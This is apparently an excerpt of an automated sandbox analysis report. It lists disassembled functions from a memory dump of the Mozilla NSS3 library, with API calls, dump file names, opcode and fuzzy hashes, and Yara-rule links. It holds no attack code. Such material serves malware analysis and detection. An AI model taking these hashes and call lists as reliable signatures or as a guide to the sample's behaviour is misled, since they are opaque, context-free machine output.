                                                                                                                                                                                                                          Function 6C4EFFD0 Relevance: 9.1, APIs: 6, Instructions: 132COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD076,00000000), ref: 6C4EFFE5
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C4F0004
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C4F001B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnterMonitor$ErrorValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3413098822-0
                                                                                                                                                                                                                          • Opcode ID: c90723736ae85db9d6e15b606aa1d86e78158f871be5656287a6206a9221ffe0
                                                                                                                                                                                                                          • Instruction ID: 723a01fe9171b1fabd2cba15f002211bcbaccebfb7f3a345d2a2a6c20d1a221a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c90723736ae85db9d6e15b606aa1d86e78158f871be5656287a6206a9221ffe0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD4128B5244680CBE720CB28DD51FAB73A1DBC1349F10053DD46BCAF90E77AA94BC642
                                                                                                                                                                                                                          Function 6C4AEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C4AEF38
                                                                                                                                                                                                                            • Part of subcall function 6C499520: PK11_IsLoggedIn.NSS3(00000000,?,6C4C379E,?,00000001,?), ref: 6C499542
                                                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C4AEF53
                                                                                                                                                                                                                            • Part of subcall function 6C4B4C20: TlsGetValue.KERNEL32 ref: 6C4B4C4C
                                                                                                                                                                                                                            • Part of subcall function 6C4B4C20: EnterCriticalSection.KERNEL32(?), ref: 6C4B4C60
                                                                                                                                                                                                                            • Part of subcall function 6C4B4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CA1
                                                                                                                                                                                                                            • Part of subcall function 6C4B4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CBE
                                                                                                                                                                                                                            • Part of subcall function 6C4B4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CD2
                                                                                                                                                                                                                            • Part of subcall function 6C4B4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4D3A
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C4AEF9E
                                                                                                                                                                                                                            • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4AEFC3
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4AF016
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4AF022
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2459274275-0
                                                                                                                                                                                                                          • Opcode ID: 735339babbfed64299df6b602b2fac162ac90e3c3ac5681aa6bec873395f73b2
                                                                                                                                                                                                                          • Instruction ID: 771c71377bd5c236ad001a0f2338ee9dbe3b3de0b14c86f21d76ec03eb7cfc8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 735339babbfed64299df6b602b2fac162ac90e3c3ac5681aa6bec873395f73b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43417171E01109ABEF01CFE9DC85FEE7BB5EB58358F004029F914A6750E77299168BA1
                                                                                                                                                                                                                          Function 6C484860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C484894
                                                                                                                                                                                                                            • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4848CA
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4848DD
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C4848FF
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C484912
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C48494A
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 759476665-0
                                                                                                                                                                                                                          • Opcode ID: ed45cc974ebefbc00a4a77a437ae56a45f900b92df428003e929b401843bd5c5
                                                                                                                                                                                                                          • Instruction ID: 8259dedcdb35d900bb7581058a460a90aaa79fe2ff848a0a2988d83cff5989a3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed45cc974ebefbc00a4a77a437ae56a45f900b92df428003e929b401843bd5c5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2341D274A06305ABE710CE69CC90FAB73EC9F8429DF40052CEA5997B81F770E904CB92
                                                                                                                                                                                                                          Function 6C49CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000060), ref: 6C49CF80
                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C49D002
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C49D016
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49D025
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C49D043
                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C49D074
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3361105336-0
                                                                                                                                                                                                                          • Opcode ID: 023c6f9769e78dcf1d9a6fbcb5d7c58b7121a8b0c3cbab1f9276d8c604b6e516
                                                                                                                                                                                                                          • Instruction ID: cd6f0a339e5e5a64f23b45d2358660fbcc702bb750a4583bba4735693d5b3c0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 023c6f9769e78dcf1d9a6fbcb5d7c58b7121a8b0c3cbab1f9276d8c604b6e516
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 904161B0A012218FEB10DF29C884F9ABFB4AF4835DF154169DC198BB56D774D885CBE1
                                                                                                                                                                                                                          Function 6C4E3FD0 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C4E3FF2
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C4E4001
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6C4E400F
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6C4E4054
                                                                                                                                                                                                                            • Part of subcall function 6C47BB90: PORT_NewArena_Util.NSS3(00001000), ref: 6C47BC24
                                                                                                                                                                                                                            • Part of subcall function 6C47BB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C47BC39
                                                                                                                                                                                                                            • Part of subcall function 6C47BB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6C47BC58
                                                                                                                                                                                                                            • Part of subcall function 6C47BB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C47BCBE
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4E4070
                                                                                                                                                                                                                          • NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6C4E40CD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3882640887-0
                                                                                                                                                                                                                          • Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
                                                                                                                                                                                                                          • Instruction ID: 024074b332031b399c2a669e95d2cd2f65bfc5c5deb53bc9044effd651d28dac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E31E771E0034197EB00DFA49C41FBA3374AF9975DF165238EE099BB42FB61E95882D2
                                                                                                                                                                                                                          Function 6C482E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C472D1A), ref: 6C482E7E
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C482EDF
                                                                                                                                                                                                                          • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C482EE9
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C472D1A), ref: 6C482F01
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C472D1A), ref: 6C482F50
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C482F81
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 287051776-0
                                                                                                                                                                                                                          • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                          • Instruction ID: 8682b2fc8d0834e62865409b8ed5583c8029c3b12f2c589c8e67cbe18bafb401
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA31E1715031018BE730C659DC48FBFB265EB80319F64097AD62997AD0EF31D88AD665
                                                                                                                                                                                                                          Function 6C470E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CERT_DecodeAVAValue.NSS3(?,?,6C470A2C), ref: 6C470E0F
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C470A2C), ref: 6C470E73
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C470A2C), ref: 6C470E85
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C470A2C), ref: 6C470E90
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C470EC4
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C470A2C), ref: 6C470ED9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3618544408-0
                                                                                                                                                                                                                          • Opcode ID: a00631a15ba2942482872cb6b72413bf3a01853ef86812595407374e4a0de15d
                                                                                                                                                                                                                          • Instruction ID: aaab6deb05cf1f27de5f81ae12faad1ec30d3399fbeda5048973e983c46ac478
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a00631a15ba2942482872cb6b72413bf3a01853ef86812595407374e4a0de15d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC212E72E0228457EB30C5665C45FEF72AEDBC1649F194035D81867B42EB62D81582F1
                                                                                                                                                                                                                          Function 6C47AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C47AEB3
                                                                                                                                                                                                                          • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C47AECA
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47AEDD
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C47AF02
                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C599500), ref: 6C47AF23
                                                                                                                                                                                                                            • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C4CF0C8
                                                                                                                                                                                                                            • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4CF122
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47AF37
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3714604333-0
                                                                                                                                                                                                                          • Opcode ID: 269004c1b0ff2aba8a83b9590b8d44f91a843efafbceb401c01fc07f95fde4f1
                                                                                                                                                                                                                          • Instruction ID: 20fdc0824170a401db236edcbb287b091fab19a9af12f6a45205b45adc2dd042
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 269004c1b0ff2aba8a83b9590b8d44f91a843efafbceb401c01fc07f95fde4f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE2128729092009BEB20CE189C01F9A7BA4AF85728F144319EC589B791E732D90587B7
                                                                                                                                                                                                                          Function 6C4FEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4FEE85
                                                                                                                                                                                                                          • realloc.MOZGLUE(92AB236F,?), ref: 6C4FEEAE
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C4FEEC5
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                          • htonl.WSOCK32(?), ref: 6C4FEEE3
                                                                                                                                                                                                                          • htonl.WSOCK32(00000000,?), ref: 6C4FEEED
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C4FEF01
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1351805024-0
                                                                                                                                                                                                                          • Opcode ID: 2f0eef626e9d23d4c97c626db91c64e9507bb30c96329d2375e6751c23f70d33
                                                                                                                                                                                                                          • Instruction ID: 1302c93ff6b1680c7aef7fe43cc51715aa8d106401f163ad40432445739cef57
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f0eef626e9d23d4c97c626db91c64e9507bb30c96329d2375e6751c23f70d33
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD21B131A00224ABDB10DF28DC84F9A77A4EF85359F158129EC299B741E330ED16CBE6
